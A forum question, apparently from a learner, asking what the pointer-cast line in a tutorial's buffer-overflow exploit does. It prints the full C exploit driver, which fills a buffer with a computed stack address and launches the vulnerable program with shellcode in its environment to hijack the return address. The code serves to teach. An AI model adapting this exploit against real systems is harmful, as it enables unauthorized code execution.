I encountered some code in a tutorial about buffer overflows. It's a program that exploits a simple program that is vulnerable to a buffer overflow (if some stack protection mechanisms are turned off).
My question is: what is the for loop doing? I mean the line within the for loop:
*(void **)(buf + i) = addr;
Its a bit of a strange syntax that I haven't seen before, or maybe I have seen it but it just confuses me.
The idea of the program is that the buf is passed as argument to the vulnerable program and through a strcpy it will overwrite the return address on the stack such that it will run the shellcode that is passed in an environment parameter.
Thanks!
The full code:
int main(int argc, char **argv) {
void *addr = (char *) 0xc0000000 - 4 - (strlen(VULN) + 1) - (strlen(&shellcode) + 1);
char buf[768];
size_t i;
for (i = 0; i < sizeof(buf); i += sizeof(void *)) {
*(void **)(buf + i) = addr;
}
char *params[] = { VULN, buf, NULL };
char *env[] = { &shellcode, NULL };
execve(VULN, params, env);
perror("execve");
return -1;
}